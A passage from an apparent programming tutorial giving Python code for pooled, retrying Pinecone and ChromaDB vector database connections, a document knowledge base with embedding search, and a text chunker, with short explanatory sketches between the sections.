474 # In normal mode, be stricter about cache matching
475 return similarity >= 0.95
476 elif self.current_mode == self.DEGRADED:
477 # In degraded mode, be more lenient
478 return similarity >= 0.85
479 else: # CRITICAL mode
480 # In critical mode, use cache aggressively
481 return similarity >= 0.7
482
483 def get_current_state(self) -> Dict[str, Any]:
484 """Get current state of the handler."""
485 return {
486 "mode": self.current_mode,
487 "resource_usage": self.resource_usage,
488 "degradation_threshold": self.degradation_threshold,
489 "critical_threshold": self.critical_threshold
490 }
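
To see how the two thresholds translate into modes, the mapping inside update_resource_usage can be reduced to a pure function. This is a minimal sketch rather than part of the handler above: `mode_for_usage` and the sample readings are hypothetical names chosen for illustration, and the defaults mirror the handler's 0.7 and 0.9 thresholds.

```python
def mode_for_usage(usage: float,
                   degradation_threshold: float = 0.7,
                   critical_threshold: float = 0.9) -> str:
    """Map a resource usage ratio (0-1) to an operating mode."""
    if usage >= critical_threshold:
        return "critical"
    if usage >= degradation_threshold:
        return "degraded"
    return "normal"


# Hypothetical usage readings, e.g. sampled from a metrics endpoint
readings = [0.42, 0.71, 0.93, 0.88, 0.55]
modes = [mode_for_usage(r) for r in readings]
print(modes)
```

Because the mapping has no hysteresis, usage that hovers around a threshold will flip the mode on every update. If that becomes noisy in practice, one option is to require usage to drop some margin below the threshold before leaving a mode.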

Using Vector Databases for Fast Knowledge Retrieval

Agents that answer from stored knowledge need fast similarity search over embeddings, which is the job of a vector database. The steps below build that integration, starting with a connection layer that adds pooling, retries, and basic metrics:

1. Setting Up a Vector Database Connection with Improved Error Handling

python
1# vector_storage/connection.py
2import os
3import time
4import logging
5import threading
6from typing import Dict, List, Any, Optional, Union, Tuple
7
8logger = logging.getLogger(__name__)
9
10class VectorDBConnection:
11 """Base class for vector database connections with connection pooling and retry logic."""
12
13 def __init__(self,
14 api_key: str,
15 environment: Optional[str] = None,
16 max_retries: int = 3,
17 retry_delay: float = 1.0,
18 pool_size: int = 5):
19 """
20 Initialize the vector database connection.
21
22 Args:
23 api_key: API key for the vector database
24 environment: Optional environment identifier
25 max_retries: Maximum number of retries for operations
26 retry_delay: Base delay between retries in seconds
27 pool_size: Size of the connection pool
28 """
29 self.api_key = api_key
30 self.environment = environment
31 self.max_retries = max_retries
32 self.retry_delay = retry_delay
33 self.pool_size = pool_size
34
35 # Connection pool and semaphore for limiting concurrent connections
36 self.connection_pool = []
37 self.pool_lock = threading.RLock()
38 self.pool_semaphore = threading.Semaphore(pool_size)
39
40 # Connection status
41 self.is_initialized = False
42 self.last_error = None
43
44 # Metrics
45 self.metrics = {
46 "queries": 0,
47 "successful_queries": 0,
48 "failed_queries": 0,
49 "retries": 0,
50 "avg_query_time": 0,
51 "total_query_time": 0
52 }
53
54 def initialize(self) -> bool:
55 """
56 Initialize the vector database connection.
57
58 Returns:
59 True if initialization succeeded, False otherwise
60 """
61 raise NotImplementedError("Subclasses must implement initialize()")
62
63 def create_connection(self) -> Any:
64 """
65 Create a new connection to the vector database.
66
67 Returns:
68 Connection object
69 """
70 raise NotImplementedError("Subclasses must implement create_connection()")
71
72 def close_connection(self, connection: Any) -> None:
73 """
74 Close a connection to the vector database.
75
76 Args:
77 connection: Connection to close
78 """
79 raise NotImplementedError("Subclasses must implement close_connection()")
80
81 def get_connection(self) -> Any:
82 """
83 Get a connection from the pool or create a new one.
84
85 Returns:
86 Connection object
87 """
88 # Acquire semaphore to limit concurrent connections
89 self.pool_semaphore.acquire()
90
91 try:
92 with self.pool_lock:
93 if self.connection_pool:
94 return self.connection_pool.pop()
95
96 # No connections in the pool, create a new one
97 return self.create_connection()
98
99 except Exception as e:
100 # Release semaphore on error
101 self.pool_semaphore.release()
102 raise
103
104 def release_connection(self, connection: Any) -> None:
105 """
106 Release a connection back to the pool.
107
108 Args:
109 connection: Connection to release
110 """
111 try:
112 with self.pool_lock:
113 self.connection_pool.append(connection)
114 finally:
115 # Always release semaphore
116 self.pool_semaphore.release()
117
118 def close_all_connections(self) -> None:
119 """Close all connections in the pool."""
120 with self.pool_lock:
121 for connection in self.connection_pool:
122 try:
123 self.close_connection(connection)
124 except Exception as e:
125 logger.warning(f"Error closing connection: {e}")
126
127 self.connection_pool = []
128
129 def with_retry(self, operation_func, *args, **kwargs):
130 """
131 Execute an operation with retry logic.
132
133 Args:
134 operation_func: Function to execute
135 *args, **kwargs: Arguments to pass to the function
136
137 Returns:
138 Result of the operation
139
140 Raises:
141 Exception: If all retries fail
142 """
143 last_exception = None
144
145 for attempt in range(self.max_retries):
146 try:
147 # Measure operation time
148 start_time = time.time()
149 result = operation_func(*args, **kwargs)
150 operation_time = time.time() - start_time
151
152 # Update metrics on success
153 self.metrics["queries"] += 1
154 self.metrics["successful_queries"] += 1
155 self.metrics["total_query_time"] += operation_time
156 self.metrics["avg_query_time"] = (
157 self.metrics["total_query_time"] / self.metrics["successful_queries"]
158 )
159
160 return result
161
162 except Exception as e:
163 last_exception = e
164 self.last_error = str(e)
165
166 # Update metrics
167 self.metrics["retries"] += 1
168
169 logger.warning(f"Vector DB operation failed (attempt {attempt+1}/{self.max_retries}): {e}")
170
171 # Exponential backoff
172 if attempt < self.max_retries - 1:
173 delay = self.retry_delay * (2 ** attempt)
174 time.sleep(delay)
175
176 # All retries failed
177 self.metrics["queries"] += 1
178 self.metrics["failed_queries"] += 1
179
180 # Re-raise the last exception
181 raise last_exception
182
183 def get_metrics(self) -> Dict[str, Any]:
184 """
185 Get connection metrics.
186
187 Returns:
188 Dictionary of metrics
189 """
190 with self.pool_lock:
191 metrics = self.metrics.copy()
192 metrics["pool_size"] = len(self.connection_pool)
193 metrics["is_initialized"] = self.is_initialized
194 metrics["last_error"] = self.last_error
195 return metrics
196
197class PineconeConnection(VectorDBConnection):
198 """Pinecone vector database connection implementation."""
199
200 def __init__(self,
201 api_key: str,
202 environment: str,
203 project_id: Optional[str] = None,
204 **kwargs):
205 """
206 Initialize Pinecone connection.
207
208 Args:
209 api_key: Pinecone API key
210 environment: Pinecone environment
211 project_id: Optional Pinecone project ID
212 **kwargs: Additional arguments for VectorDBConnection
213 """
214 super().__init__(api_key, environment, **kwargs)
215 self.project_id = project_id
216 self.indexes = {} # Cache for index connections
217
    def initialize(self) -> bool:
        """
        Initialize the Pinecone client.

        Note: this targets the legacy pinecone-client 2.x API. The module-level
        pinecone.init() call was removed in pinecone-client 3.0, which uses a
        Pinecone(api_key=...) client object instead.

        Returns:
            True if initialization succeeded
        """
        try:
            import pinecone

            # Initialize Pinecone (module-level configuration in 2.x)
            pinecone.init(
                api_key=self.api_key,
                environment=self.environment
            )

            self.is_initialized = True
            return True

        except Exception as e:
            logger.error(f"Failed to initialize Pinecone: {e}")
            self.last_error = str(e)
            self.is_initialized = False
            return False
242
243 def create_connection(self) -> Any:
244 """
245 Create a new connection to Pinecone.
246
247 Returns:
248 Pinecone client
249 """
250 import pinecone
251
252 if not self.is_initialized:
253 self.initialize()
254
255 # Pinecone doesn't have a dedicated connection object
256 # We'll just return the module for now
257 return pinecone
258
259 def close_connection(self, connection: Any) -> None:
260 """
261 Close connection to Pinecone.
262
263 Args:
264 connection: Pinecone connection
265 """
266 # Pinecone doesn't require explicit connection closing
267 pass
268
269 def get_index(self, index_name: str) -> Any:
270 """
271 Get a Pinecone index.
272
273 Args:
274 index_name: Name of the index
275
276 Returns:
277 Pinecone index object
278 """
279 import pinecone
280
281 # Check if index is cached
282 if index_name in self.indexes:
283 return self.indexes[index_name]
284
285 # Get connection
286 connection = self.get_connection()
287
288 try:
289 # Get the index
290 index = connection.Index(index_name)
291
292 # Cache the index
293 self.indexes[index_name] = index
294
295 return index
296
297 finally:
298 # Release connection
299 self.release_connection(connection)
300
301 def query(self,
302 index_name: str,
303 vector: List[float],
304 top_k: int = 10,
305 include_metadata: bool = True,
306 include_values: bool = False,
307 namespace: str = "",
308 filter: Optional[Dict[str, Any]] = None) -> Dict[str, Any]:
309 """
310 Query a Pinecone index.
311
312 Args:
313 index_name: Name of the index
314 vector: Query vector
315 top_k: Number of results to return
316 include_metadata: Whether to include metadata
317 include_values: Whether to include vector values
318 namespace: Optional namespace
319 filter: Optional filter
320
321 Returns:
322 Query results
323 """
324 def _do_query():
325 index = self.get_index(index_name)
326
327 return index.query(
328 vector=vector,
329 top_k=top_k,
330 include_metadata=include_metadata,
331 include_values=include_values,
332 namespace=namespace,
333 filter=filter
334 )
335
336 return self.with_retry(_do_query)
337
338 def upsert(self,
339 index_name: str,
340 vectors: List[Tuple[str, List[float], Dict[str, Any]]],
341 namespace: str = "") -> Dict[str, Any]:
342 """
343 Upsert vectors to a Pinecone index.
344
345 Args:
346 index_name: Name of the index
347 vectors: List of (id, vector, metadata) tuples
348 namespace: Optional namespace
349
350 Returns:
351 Upsert response
352 """
353 def _do_upsert():
354 index = self.get_index(index_name)
355
356 # Format vectors for Pinecone
357 formatted_vectors = [
358 (id, vector, metadata)
359 for id, vector, metadata in vectors
360 ]
361
362 return index.upsert(
363 vectors=formatted_vectors,
364 namespace=namespace
365 )
366
367 return self.with_retry(_do_upsert)
368
369 def delete(self,
370 index_name: str,
371 ids: Optional[List[str]] = None,
372 delete_all: bool = False,
373 namespace: str = "",
374 filter: Optional[Dict[str, Any]] = None) -> Dict[str, Any]:
375 """
376 Delete vectors from a Pinecone index.
377
378 Args:
379 index_name: Name of the index
380 ids: List of vector IDs to delete
381 delete_all: Whether to delete all vectors
382 namespace: Optional namespace
383 filter: Optional filter
384
385 Returns:
386 Delete response
387 """
388 def _do_delete():
389 index = self.get_index(index_name)
390
391 if delete_all:
392 return index.delete(delete_all=True, namespace=namespace)
393 elif filter:
394 return index.delete(filter=filter, namespace=namespace)
395 else:
396 return index.delete(ids=ids, namespace=namespace)
397
398 return self.with_retry(_do_delete)
399
400 def list_indexes(self) -> List[str]:
401 """
402 List all Pinecone indexes.
403
404 Returns:
405 List of index names
406 """
407 def _do_list():
408 connection = self.get_connection()
409 try:
410 return connection.list_indexes()
411 finally:
412 self.release_connection(connection)
413
414 return self.with_retry(_do_list)
415
416 def create_index(self,
417 name: str,
418 dimension: int,
419 metric: str = "cosine",
420 pods: int = 1,
421 replicas: int = 1,
422 pod_type: str = "p1.x1") -> bool:
423 """
424 Create a new Pinecone index.
425
426 Args:
427 name: Index name
428 dimension: Vector dimension
429 metric: Distance metric
430 pods: Number of pods
431 replicas: Number of replicas
432 pod_type: Pod type
433
434 Returns:
435 True if index was created
436 """
437 def _do_create():
438 connection = self.get_connection()
439 try:
440 connection.create_index(
441 name=name,
442 dimension=dimension,
443 metric=metric,
444 pods=pods,
445 replicas=replicas,
446 pod_type=pod_type
447 )
448 return True
449 finally:
450 self.release_connection(connection)
451
452 return self.with_retry(_do_create)
453
454 def delete_index(self, name: str) -> bool:
455 """
456 Delete a Pinecone index.
457
458 Args:
459 name: Index name
460
461 Returns:
462 True if index was deleted
463 """
464 def _do_delete():
465 connection = self.get_connection()
466 try:
467 connection.delete_index(name)
468
469 # Remove from index cache
470 if name in self.indexes:
471 del self.indexes[name]
472
473 return True
474 finally:
475 self.release_connection(connection)
476
477 return self.with_retry(_do_delete)
478
479class ChromaDBConnection(VectorDBConnection):
480 """ChromaDB vector database connection implementation."""
481
482 def __init__(self,
483 host: Optional[str] = None,
484 port: Optional[int] = None,
485 ssl: bool = False,
486 headers: Optional[Dict[str, str]] = None,
487 persistent_dir: Optional[str] = None,
488 **kwargs):
489 """
490 Initialize ChromaDB connection.
491
492 Args:
493 host: ChromaDB host for HTTP client
494 port: ChromaDB port for HTTP client
495 ssl: Whether to use SSL
496 headers: Optional headers for HTTP client
497 persistent_dir: Directory for local persistence
498 **kwargs: Additional arguments for VectorDBConnection
499 """
500 # ChromaDB doesn't use API key or environment in the same way
501 super().__init__(api_key="", **kwargs)
502
503 self.host = host
504 self.port = port
505 self.ssl = ssl
506 self.headers = headers
507 self.persistent_dir = persistent_dir
508 self.client_type = "http" if host else "persistent"
509
510 # Cache for collection connections
511 self.collections = {}
512
513 def initialize(self) -> bool:
514 """
515 Initialize the ChromaDB client.
516
517 Returns:
518 True if initialization succeeded
519 """
520 try:
521 import chromadb
522
523 # Initialize connection based on configuration
524 if self.client_type == "http":
525 self._client_args = {
526 "host": self.host,
527 "port": self.port,
528 "ssl": self.ssl,
529 "headers": self.headers
530 }
531 else:
532 self._client_args = {
533 "path": self.persistent_dir
534 }
535
536 # Test connection
537 client = self.create_connection()
538 heartbeat = client.heartbeat()
539
540 self.is_initialized = True
541 return True
542
543 except Exception as e:
544 logger.error(f"Failed to initialize ChromaDB: {e}")
545 self.last_error = str(e)
546 self.is_initialized = False
547 return False
548
549 def create_connection(self) -> Any:
550 """
551 Create a new connection to ChromaDB.
552
553 Returns:
554 ChromaDB client
555 """
556 import chromadb
557
558 if not self.is_initialized:
559 self.initialize()
560
561 # Create client based on client type
562 if self.client_type == "http":
563 return chromadb.HttpClient(**self._client_args)
564 else:
565 return chromadb.PersistentClient(**self._client_args)
566
567 def close_connection(self, connection: Any) -> None:
568 """
569 Close connection to ChromaDB.
570
571 Args:
572 connection: ChromaDB connection
573 """
574 # No explicit closing needed for ChromaDB
575 pass
576
577 def get_collection(self,
578 name: str,
579 embedding_function: Optional[Any] = None,
580 create_if_missing: bool = True) -> Any:
581 """
582 Get a ChromaDB collection.
583
584 Args:
585 name: Collection name
586 embedding_function: Optional embedding function
587 create_if_missing: Whether to create collection if it doesn't exist
588
589 Returns:
590 ChromaDB collection
591 """
592 # Check if collection is cached
593 collection_key = f"{name}_{id(embedding_function)}"
594 if collection_key in self.collections:
595 return self.collections[collection_key]
596
597 # Get connection
598 client = self.get_connection()
599
600 try:
601 # Try to get collection
602 try:
603 collection = client.get_collection(
604 name=name,
605 embedding_function=embedding_function
606 )
607 except Exception as e:
608 # Collection doesn't exist
609 if create_if_missing:
610 collection = client.create_collection(
611 name=name,
612 embedding_function=embedding_function
613 )
614 else:
615 raise
616
617 # Cache the collection
618 self.collections[collection_key] = collection
619
620 return collection
621
622 finally:
623 # Release connection
624 self.release_connection(client)
625
626 def query(self,
627 collection_name: str,
628 query_texts: Optional[List[str]] = None,
629 query_embeddings: Optional[List[List[float]]] = None,
630 n_results: int = 10,
631 where: Optional[Dict[str, Any]] = None,
632 embedding_function: Optional[Any] = None) -> Dict[str, Any]:
633 """
634 Query a ChromaDB collection.
635
636 Args:
637 collection_name: Collection name
638 query_texts: Query texts
639 query_embeddings: Query embeddings
640 n_results: Number of results to return
641 where: Optional filter
642 embedding_function: Optional embedding function
643
644 Returns:
645 Query results
646 """
647 def _do_query():
648 collection = self.get_collection(
649 collection_name,
650 embedding_function,
651 create_if_missing=False
652 )
653
654 return collection.query(
655 query_texts=query_texts,
656 query_embeddings=query_embeddings,
657 n_results=n_results,
658 where=where
659 )
660
661 return self.with_retry(_do_query)
662
663 def add_documents(self,
664 collection_name: str,
665 documents: List[str],
666 metadatas: Optional[List[Dict[str, Any]]] = None,
667 ids: Optional[List[str]] = None,
668 embedding_function: Optional[Any] = None) -> Dict[str, Any]:
669 """
670 Add documents to a ChromaDB collection.
671
672 Args:
673 collection_name: Collection name
674 documents: Documents to add
675 metadatas: Optional metadata for each document
676 ids: Optional IDs for each document
677 embedding_function: Optional embedding function
678
679 Returns:
680 Add response
681 """
682 def _do_add():
683 collection = self.get_collection(
684 collection_name,
685 embedding_function,
686 create_if_missing=True
687 )
688
689 return collection.add(
690 documents=documents,
691 metadatas=metadatas,
692 ids=ids
693 )
694
695 return self.with_retry(_do_add)
696
697 def delete(self,
698 collection_name: str,
699 ids: Optional[List[str]] = None,
700 where: Optional[Dict[str, Any]] = None,
701 embedding_function: Optional[Any] = None) -> Dict[str, Any]:
702 """
703 Delete documents from a ChromaDB collection.
704
705 Args:
706 collection_name: Collection name
707 ids: Optional IDs to delete
708 where: Optional filter
709 embedding_function: Optional embedding function
710
711 Returns:
712 Delete response
713 """
714 def _do_delete():
715 collection = self.get_collection(
716 collection_name,
717 embedding_function,
718 create_if_missing=False
719 )
720
721 return collection.delete(
722 ids=ids,
723 where=where
724 )
725
726 return self.with_retry(_do_delete)
727
728 def list_collections(self) -> List[str]:
729 """
730 List all ChromaDB collections.
731
732 Returns:
733 List of collection names
734 """
735 def _do_list():
736 client = self.get_connection()
737 try:
738 collections = client.list_collections()
739 return [collection.name for collection in collections]
740 finally:
741 self.release_connection(client)
742
743 return self.with_retry(_do_list)
744
745 def delete_collection(self, name: str) -> bool:
746 """
747 Delete a ChromaDB collection.
748
749 Args:
750 name: Collection name
751
752 Returns:
753 True if collection was deleted
754 """
755 def _do_delete():
756 client = self.get_connection()
757 try:
758 client.delete_collection(name)
759
760 # Remove from collection cache
761 for key in list(self.collections.keys()):
762 if key.startswith(f"{name}_"):
763 del self.collections[key]
764
765 return True
766 finally:
767 self.release_connection(client)
768
769 return self.with_retry(_do_delete)
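
Every method above pairs get_connection() with release_connection() in a try/finally block. A context manager can make that pairing harder to forget. The sketch below is a standalone toy, not the classes above: `SimplePool`, its `connection()` method, and `idle_count()` are hypothetical names, and `object` stands in for a real client factory.

```python
import threading
from contextlib import contextmanager
from typing import Any, Callable, Iterator, List


class SimplePool:
    """Toy pool using the same semaphore-plus-list design (hypothetical class)."""

    def __init__(self, factory: Callable[[], Any], pool_size: int = 2):
        self._factory = factory
        self._idle: List[Any] = []
        self._lock = threading.Lock()
        self._slots = threading.Semaphore(pool_size)

    @contextmanager
    def connection(self) -> Iterator[Any]:
        """Borrow a connection and always return it, even if the caller raises."""
        self._slots.acquire()
        try:
            with self._lock:
                conn = self._idle.pop() if self._idle else None
            if conn is None:
                conn = self._factory()
            try:
                yield conn
            finally:
                # Return the connection to the idle list for reuse
                with self._lock:
                    self._idle.append(conn)
        finally:
            # Free the slot whether or not a connection was obtained
            self._slots.release()

    def idle_count(self) -> int:
        with self._lock:
            return len(self._idle)


pool = SimplePool(factory=object, pool_size=2)

with pool.connection() as first:
    pass  # use the connection here

try:
    with pool.connection() as second:
        raise ValueError("simulated query failure")
except ValueError:
    pass

reused = second is first
print(pool.idle_count(), reused)
```

The second borrow reuses the connection returned by the first, and the simulated failure still hands it back to the pool. Whether a connection that just failed should be reused or discarded is a separate design decision this sketch does not address.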

2. Knowledge Base Implementation with Vector Database

python
# vector_storage/knowledge_base.py
import logging
from typing import Any, Callable, Dict, List, Optional, Tuple
from dataclasses import dataclass, field

from .connection import VectorDBConnection, PineconeConnection, ChromaDBConnection

logger = logging.getLogger(__name__)

@dataclass
class Document:
    """Document for storage in knowledge base."""
    id: str
    content: str
    metadata: Dict[str, Any] = field(default_factory=dict)
    embedding: Optional[List[float]] = None
    score: float = 0.0

class KnowledgeBase:
    """
    Knowledge base for storing and retrieving documents using vector embeddings.
    """

    def __init__(self,
                 vector_db: VectorDBConnection,
                 embedding_function: Callable[[str], List[float]],
                 collection_name: str,
                 dimension: int = 1536):
        """
        Initialize the knowledge base.

        Args:
            vector_db: Vector database connection
            embedding_function: Function to convert text to embeddings
            collection_name: Name of the collection/index
            dimension: Dimension of the embeddings
        """
        self.vector_db = vector_db
        self.embedding_function = embedding_function
        self.collection_name = collection_name
        self.dimension = dimension

        self.ensure_collection_exists()

    def _chroma_collection(self, create_if_missing: bool = False) -> Any:
        """Return the ChromaDB collection backing this knowledge base."""
        # Embeddings are computed by this class, so no collection-level
        # embedding function is attached.
        return self.vector_db.get_collection(
            name=self.collection_name,
            embedding_function=None,
            create_if_missing=create_if_missing
        )

    def ensure_collection_exists(self) -> bool:
        """
        Ensure the collection/index exists in the vector database.

        Returns:
            True if collection exists or was created
        """
        # Implementation depends on specific vector database
        try:
            if isinstance(self.vector_db, PineconeConnection):
                # Check if index exists
                indexes = self.vector_db.list_indexes()

                if self.collection_name not in indexes:
                    # Create index
                    self.vector_db.create_index(
                        name=self.collection_name,
                        dimension=self.dimension,
                        metric="cosine"
                    )

                return True

            elif isinstance(self.vector_db, ChromaDBConnection):
                # ChromaDB will create collection if it doesn't exist
                self._chroma_collection(create_if_missing=True)
                return True

            else:
                logger.warning(f"Unsupported vector database type: {type(self.vector_db)}")
                return False

        except Exception as e:
            logger.error(f"Error ensuring collection exists: {e}")
            return False

    def get_embedding(self, text: str) -> List[float]:
        """
        Get embedding for text.

        Args:
            text: Text to embed

        Returns:
            Embedding vector
        """
        try:
            return self.embedding_function(text)
        except Exception as e:
            logger.error(f"Error getting embedding: {e}")
            raise

    def add_document(self, document: Document) -> bool:
        """
        Add a document to the knowledge base.

        Args:
            document: Document to add

        Returns:
            True if document was added successfully
        """
        success, _ = self.add_documents([document])
        return success

    def add_documents(self, documents: List[Document]) -> Tuple[bool, int]:
        """
        Add multiple documents to the knowledge base.

        Args:
            documents: Documents to add

        Returns:
            Tuple of (success, number of documents added)
        """
        try:
            # Generate embeddings for documents without them
            for doc in documents:
                if doc.embedding is None:
                    doc.embedding = self.get_embedding(doc.content)

            # Add to vector database
            if isinstance(self.vector_db, PineconeConnection):
                # Pinecone stores only ids, vectors, and metadata, so keep the
                # text under metadata["text"] where search() expects it
                vectors = [
                    (doc.id, doc.embedding, {**doc.metadata, "text": doc.content})
                    for doc in documents
                ]

                self.vector_db.upsert(
                    index_name=self.collection_name,
                    vectors=vectors,
                    namespace=""
                )

            elif isinstance(self.vector_db, ChromaDBConnection):
                # Pass the precomputed embeddings explicitly; upsert also
                # makes update_document() overwrite existing ids
                collection = self._chroma_collection(create_if_missing=True)
                self.vector_db.with_retry(
                    collection.upsert,
                    ids=[doc.id for doc in documents],
                    embeddings=[doc.embedding for doc in documents],
                    documents=[doc.content for doc in documents],
                    # Some ChromaDB versions reject empty metadata dicts
                    metadatas=[doc.metadata or None for doc in documents]
                )

            else:
                logger.warning(f"Unsupported vector database type: {type(self.vector_db)}")
                return False, 0

            return True, len(documents)

        except Exception as e:
            logger.error(f"Error adding documents: {e}")
            return False, 0

    def delete_document(self, document_id: str) -> bool:
        """
        Delete a document from the knowledge base.

        Args:
            document_id: ID of document to delete

        Returns:
            True if document was deleted successfully
        """
        try:
            # Delete from vector database
            if isinstance(self.vector_db, PineconeConnection):
                self.vector_db.delete(
                    index_name=self.collection_name,
                    ids=[document_id],
                    namespace=""
                )

            elif isinstance(self.vector_db, ChromaDBConnection):
                self.vector_db.delete(
                    collection_name=self.collection_name,
                    ids=[document_id]
                )

            else:
                logger.warning(f"Unsupported vector database type: {type(self.vector_db)}")
                return False

            return True

        except Exception as e:
            logger.error(f"Error deleting document: {e}")
            return False

    def search(self,
               query: str,
               top_k: int = 5,
               threshold: float = 0.0,
               filter: Optional[Dict[str, Any]] = None) -> List[Document]:
        """
        Search for documents similar to the query.

        Args:
            query: Query string
            top_k: Number of results to return
            threshold: Minimum similarity threshold
            filter: Optional filter for metadata

        Returns:
            List of matching documents
        """
        try:
            # Get query embedding
            query_embedding = self.get_embedding(query)

            # Search vector database
            if isinstance(self.vector_db, PineconeConnection):
                response = self.vector_db.query(
                    index_name=self.collection_name,
                    vector=query_embedding,
                    top_k=top_k,
                    include_metadata=True,
                    filter=filter
                )

                # Convert response to documents
                documents = []
                for match in response.get("matches", []):
                    if match.get("score", 0) >= threshold:
                        # The text was stored under metadata["text"] on upsert
                        metadata = dict(match.get("metadata") or {})
                        content = metadata.pop("text", "")
                        documents.append(Document(
                            id=match.get("id", ""),
                            content=content,
                            metadata=metadata,
                            score=match.get("score", 0)
                        ))

                return documents

            elif isinstance(self.vector_db, ChromaDBConnection):
                response = self.vector_db.query(
                    collection_name=self.collection_name,
                    query_embeddings=[query_embedding],
                    n_results=top_k,
                    where=filter
                )

                # Convert response to documents
                documents = []

                ids = response.get("ids", [[]])[0]
                distances = response.get("distances", [[]])[0]
                metadatas = response.get("metadatas", [[]])[0]
                documents_content = response.get("documents", [[]])[0]

                for i in range(len(ids)):
                    # ChromaDB returns distances. 1 - distance is a similarity
                    # only for cosine distance, so the collection's distance
                    # metric must be cosine for the threshold to be meaningful.
                    score = 1.0 - distances[i]

                    if score >= threshold:
                        documents.append(Document(
                            id=ids[i],
                            content=documents_content[i],
                            metadata=(metadatas[i] or {}) if metadatas else {},
                            score=score
                        ))

                return documents

            else:
                logger.warning(f"Unsupported vector database type: {type(self.vector_db)}")
                return []

        except Exception as e:
            logger.error(f"Error searching documents: {e}")
            return []

    def update_document(self, document: Document) -> bool:
        """
        Update a document in the knowledge base.

        Args:
            document: Updated document

        Returns:
            True if document was updated successfully
        """
        # Both backends are written with upsert semantics, so updating is
        # the same as adding a document with an existing ID
        return self.add_document(document)

    def get_document_by_id(self, document_id: str) -> Optional[Document]:
        """
        Get a document by ID.

        Args:
            document_id: Document ID

        Returns:
            Document if found, None otherwise
        """
        try:
            # Implementation depends on specific vector database
            if isinstance(self.vector_db, PineconeConnection):
                # Fetch the vector and metadata for the ID directly from the index
                index = self.vector_db.get_index(self.collection_name)
                response = index.fetch(ids=[document_id])

                if document_id in response.get("vectors", {}):
                    vector_data = response["vectors"][document_id]
                    metadata = dict(vector_data.get("metadata") or {})
                    content = metadata.pop("text", "")

                    return Document(
                        id=document_id,
                        content=content,
                        metadata=metadata,
                        embedding=vector_data.get("values"),
                        score=1.0  # Not a search result, so score not applicable
                    )

                return None

            elif isinstance(self.vector_db, ChromaDBConnection):
                # Get collection
                collection = self._chroma_collection(create_if_missing=False)

                # Get document by ID
                response = collection.get(ids=[document_id])

                if response.get("ids") and len(response["ids"]) > 0:
                    return Document(
                        id=response["ids"][0],
                        content=response.get("documents", [""])[0],
                        metadata=(response["metadatas"][0] or {}) if response.get("metadatas") else {},
                        embedding=response["embeddings"][0] if response.get("embeddings") else None,
                        score=1.0  # Not a search result
                    )

                return None

            else:
                logger.warning(f"Unsupported vector database type: {type(self.vector_db)}")
                return None

        except Exception as e:
            logger.error(f"Error getting document by ID: {e}")
            return None
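
The ChromaDB branch of search() turns a distance into a score with 1 - distance, which is a true similarity only under cosine distance. The sketch below shows one way to make the conversion depend on the metric. It assumes ChromaDB's documented distance definitions for the `hnsw:space` setting (squared L2, 1 minus inner product, 1 minus cosine similarity); `distance_to_score` is a hypothetical helper, and the 1 / (1 + d) mapping for L2 is one convention among several, chosen only because it is monotone and bounded.

```python
def distance_to_score(distance: float, space: str = "cosine") -> float:
    """Convert a vector distance into a higher-is-better score."""
    if space == "cosine":
        # Cosine distance is 1 - cosine similarity
        return 1.0 - distance
    if space == "ip":
        # Inner-product distance is 1 - dot product
        return 1.0 - distance
    if space == "l2":
        # Squared L2 has no upper bound, so squash it into (0, 1]
        return 1.0 / (1.0 + distance)
    raise ValueError(f"Unknown distance space: {space}")


print(distance_to_score(0.25, "cosine"))
print(distance_to_score(3.0, "l2"))
```

A threshold tuned for one metric does not carry over to another, so the similarity threshold passed to search() should be chosen together with the collection's distance metric.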

3. Text Chunking and Processing for Knowledge Base

python
1# vector_storage/text_processing.py
2import re
3import hashlib
4import logging
5from typing import List, Dict, Any, Optional, Tuple
6
7logger = logging.getLogger(__name__)
8
9class TextChunker:
10 """
11 Splits text into chunks for storage in a vector database.
12 """
13
14 def __init__(self,
15 chunk_size: int = 1000,
16 chunk_overlap: int = 200,
17 tokenizer: Optional[callable] = None):
18 """
19 Initialize the text chunker.
20
21 Args:
22 chunk_size: Target size of chunks in characters
23 chunk_overlap: Overlap between chunks in characters
24 tokenizer: Optional tokenizer function
25 """
26 self.chunk_size = chunk_size
27 self.chunk_overlap = chunk_overlap
28 self.tokenizer = tokenizer or self._default_tokenizer
29
30 def _default_tokenizer(self, text: str) -> List[str]:
31 """
32 Simple whitespace tokenizer.
33
34 Args:
35 text: Text to tokenize
36
37 Returns:
38 List of tokens
39 """
40 return text.split()
41
    def split_text(self, text: str) -> List[str]:
        """
        Split text into overlapping chunks.

        Args:
            text: Text to split

        Returns:
            List of text chunks
        """
        # Basic preprocessing
        text = text.strip()

        # Short text fits in a single chunk
        if len(text) <= self.chunk_size:
            return [text]

        chunks = []
        start = 0

        while start < len(text):
            # Tentative end of this chunk
            end = min(start + self.chunk_size, len(text))

            if end < len(text):
                # Prefer a sentence boundary, then fall back to a word boundary
                boundary = self._find_sentence_boundary(text, end)
                if boundary == -1:
                    boundary = self._find_word_boundary(text, end)
                # Only accept a boundary that keeps the chunk non-empty
                if boundary > start:
                    end = boundary

            chunks.append(text[start:end])

            # The last chunk has been emitted. Stepping back by the overlap
            # here would re-slice the same tail forever, so stop.
            if end >= len(text):
                break

            # Step back by the overlap, but always move forward
            start = max(end - self.chunk_overlap, start + 1)

        return chunks
95
96 def _find_sentence_boundary(self, text: str, position: int) -> int:
97 """
98 Find the nearest sentence boundary before the position.
99
100 Args:
101 text: Text to search
102 position: Position to search from
103
104 Returns:
105 Position of sentence boundary, or -1 if not found
106 """
107 sentence_end_pattern = r'[.!?]\s+'
108
109 # Search for sentence boundaries in a window before the position
110 search_start = max(0, position - 100)
111 search_text = text[search_start:position]
112
113 matches = list(re.finditer(sentence_end_pattern, search_text))
114 if matches:
115 last_match = matches[-1]
116 return search_start + last_match.end()
117
118 return -1
119
120 def _find_word_boundary(self, text: str, position: int) -> int:
121 """
122 Find the nearest word boundary before the position.
123
124 Args:
125 text: Text to search
126 position: Position to search from
127
128 Returns:
129 Position of word boundary, or -1 if not found
130 """
131 # Search for space characters in a window before the position
132 search_start = max(0, position - 50)
133 search_text = text[search_start:position]
134
135 matches = list(re.finditer(r'\s+', search_text))
136 if matches:
137 last_match = matches[-1]
138 return search_start + last_match.end()
139
140 return -1
141
142 def get_text_chunks_with_metadata(self,
143 text: str,
144 metadata: Dict[str, Any],
145 document_id: Optional[str] = None) -> List[Tuple[str, Dict[str, Any], str]]:
146 """
147 Split text into chunks and prepare for vector database storage.
148
149 Args:
150 text: Text to split
151 metadata: Base metadata for the document
152 document_id: Optional document ID prefix
153
154 Returns:
155 List of (chunk, metadata, id) tuples
